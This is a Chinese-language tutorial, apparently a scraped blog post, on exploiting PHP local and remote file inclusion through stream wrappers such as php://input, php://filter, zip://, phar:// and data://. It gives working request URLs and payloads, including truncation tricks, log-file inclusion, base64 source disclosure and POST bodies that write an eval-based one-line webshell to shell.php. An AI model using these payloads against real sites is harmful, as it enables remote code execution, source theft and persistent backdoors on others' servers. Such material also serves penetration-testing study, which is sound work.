php偽協議的用法

php種偽協議的用法

參考：https://segmentfault.com/a/1190000018991087

PHP支持的偽協議

PHP文件包含漏洞的產生原因是在通過PHP的函數引入文件時，由於傳入的文件名沒有經過合理的校驗，從而操作了預想之外的文件，就可能導致意外的文件泄露甚至惡意的代碼注入。

1 2 3 4 5 6 7 8 9 10 11 12

file : //  — 訪問本地文件系統 http: //  — 訪問 HTTP(s) 網址 ftp : //  — 訪問 FTP(s) URLs php: //  — 訪問各個輸入/輸出流（I /O  streams） zlib: //  — 壓縮流 data: //  — 數據（RFC 2397） glob: //  — 查找匹配的文件路徑模式 phar: //  — PHP 歸檔 ssh2: //  — Secure Shell 2 rar: //  — RAR ogg: //  — 音頻流 expect: //  — 處理交互式的流

php.ini參數設置

在php.ini里有兩個重要的參數allow_url_fopen、allow_url_include。

allow_url_fopen:默認值是ON。允許url里的封裝協議訪問文件；

allow_url_include:默認值是OFF。不允許包含url里的封裝協議包含文件；

有限制 包含

%00截斷 不推薦

條件：magic_quotes_gpc=OFF php版本 <5.3.4

長度截斷 不穩定

條件：windows，點號需要長於256；linux長度4096 ././././....

？截斷

只在遠程文件包含使用

POST包含中國蟻劍連接

請求信息：http body
name：file
value：123.txt

各協議的利用條件和方法

php://input

php://input可以訪問請求的原始數據的只讀流，將post請求的數據當作php代碼執行。當傳入的參數作為文件名打開時，可以將參數設為php://input,同時post想設置的文件內容，php執行時會將post內容當作文件內容。

注：當enctype=”multipart/form-data”時，php://input是無效的。

php://input
用法：?file=php://input 數據利用POST傳過去。
GIF89a
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?>

file://

用於訪問本地文件系統。當指定了一個相對路徑（不以/、、\或 Windows 盤符開頭的路徑）提供的路徑將基於當前的工作目錄。

用法：

1 2 3 4

1、file: //[文件的絕對路徑和文件名] http: //127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt 2、[文件的相對路徑和文件名] http: //127.0.0.1/include.php?file=./phpinfo.txt

利用日志文件包含
?file=/var/log/nginx/access.log
?file=file:///D:/phpstudy_pro/WWW/php/123.txt
需要完整路徑
?file=file://C:/Windows/System32/drivers/etc/hosts.txt
?file=file://C:/phpstudy_pro/Extensions/Nginx1.15.11/logs/access.log

http://、https://

URL 形式，允許通過 HTTP 1.0 的 GET方法，以只讀訪問文件或資源，通常用於遠程包含。

用法：

1	[http： //網絡路徑和文件名]

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

php://

php:// 用於訪問各個輸入/輸出流（I/O streams），經常使用的是php://filter和php://input，php://filter用於讀取源碼，php://input用於執行php代碼。

協議	作用
php://input	可以訪問請求的原始數據的只讀流，在POST請求中訪問POST的data部分，在enctype="multipart/form-data" 的時候php://input 是無效的。
php://output	只寫的數據流，允許以 print 和 echo 一樣的方式寫入到輸出緩沖區。
php://fd	(>=5.3.6)允許直接訪問指定的文件描述符。例如 php://fd/3 引用了文件描述符 3。
php://memory php://temp	(>=5.1.0)一個類似文件包裝器的數據流，允許讀寫臨時數據。兩者的唯一區別是 php://memory 總是把數據儲存在內存中，而 php://temp 會在內存量達到預定義的限制后（默認是 2MB）存入臨時文件中。臨時文件位置的決定和 sys_get_temp_dir() 的方式一致。
php://filter	(>=5.0.0)一種元封裝器，設計用於數據流打開時的篩選過濾應用。對於一體式（all-in-one）的文件函數非常有用，類似 readfile()、file() 和 file_get_contents()，在數據流內容讀取之前沒有機會應用其他過濾器。

php://filter參數詳解

參數                                                                        描述

resource=<要過濾的數據流>	必須項。它指定了你要篩選過濾的數據流。
read=<讀鏈的過濾器>	該參數可選。可以設定一個或多個過濾器名稱，以管道符(|)分隔
write=<寫鏈的篩選列表>	該參數可選。可以設定一個或多個過濾器名稱，以管道符(|)分隔
<; 兩個鏈的過濾器>	任何沒有以 read= 或 write= 作前綴的篩選器列表會視情況應用於讀或寫鏈。

可用的過濾器列表（4類）

字符串過濾器	作用
string.rot13	等同於str_rot13()，rot13變換
string.toupper	等同於strtoupper()，轉大寫字母
string.tolower	等同於strtolower()，轉小寫字母
string.strip_tags	等同於strip_tags()，去除html、PHP語言標簽

轉換過濾器	作用
convert.base64-encode & convert.base64-decode	等同於base64_encode()和base64_decode()，base64編碼解碼
convert.quoted-printable-encode & convert.quoted-printable-decode	quoted-printable 字符串與 8-bit 字符串編碼解碼

壓縮過濾器	作用
zlib.deflate & zlib.inflate	在本地文件系統中創建 gzip 兼容文件的方法，但不產生命令行工具如 gzip的頭和尾信息。只是壓縮和解壓數據流中的有效載荷部分。
bzip2.compress & bzip2.decompress	同上，在本地文件系統中創建 bz2 兼容文件的方法。

加密過濾器	作用
mcrypt.*	libmcrypt 對稱加密算法
mdecrypt.*	libmcrypt 對稱解密算法

讀取文件源碼用法

1 2	php: //filter/read=convert.base64-encode/resource=[文件名] http: //127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

執行php代碼用法

1 2 3 4

php: //input + [POST DATA] http: //127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?>

寫入一句話木馬用法

1 2 3

http: //127.0.0.1/include.php?file=php://input [POST DATA部分] <?php  fputs ( fopen ( 'shell.php' , 'w' ), '<?php @eval($_GET[cmd]); ?>' ); ?>

phar://、zip://、bzip2://、zlib://

用於讀取壓縮文件，zip:// 、 bzip2:// 、 zlib:// 均屬於壓縮流，可以訪問壓縮文件中的子文件，更重要的是不需要指定后綴名，可修改為任意后綴：jpg png gif xxx 等等。

用法示例

1 2 3 4 5 6 7 8

1、zip: //[壓縮文件絕對路徑]%23[壓縮文件內的子文件名]（#編碼為%23） http: //127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt   2、compress.bzip2: //file.bz2 http: //127.0.0.1/include.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpghttp://127.0.0.1/include.php?file=compress.bzip2://./file.jpg   3、compress.zlib: //file.gz http: //127.0.0.1/include.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpghttp://127.0.0.1/include.php?file=compress.zlib://./file.jpg4、phar://

http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

phar://
    ?file=phar://xxx.php
    phar://123.zip/ 相當於一個文件夾
    先創建一個123.php 再壓縮文件為123.zip 最后改后綴名為123.jpg
    http://127.0.0.1/php/test.php?file=phar://123.jpg/123.php
    http://127.0.0.1/php/test.php?file=phar://123.zip/123.php

data://

數據流封裝器，以傳遞相應格式的數據。通常可以用來執行PHP代碼。

示例用法

1 2 3 4 5

1、data: //text/plain, http: //127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>   2、data: //text/plain;base64, http: //127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b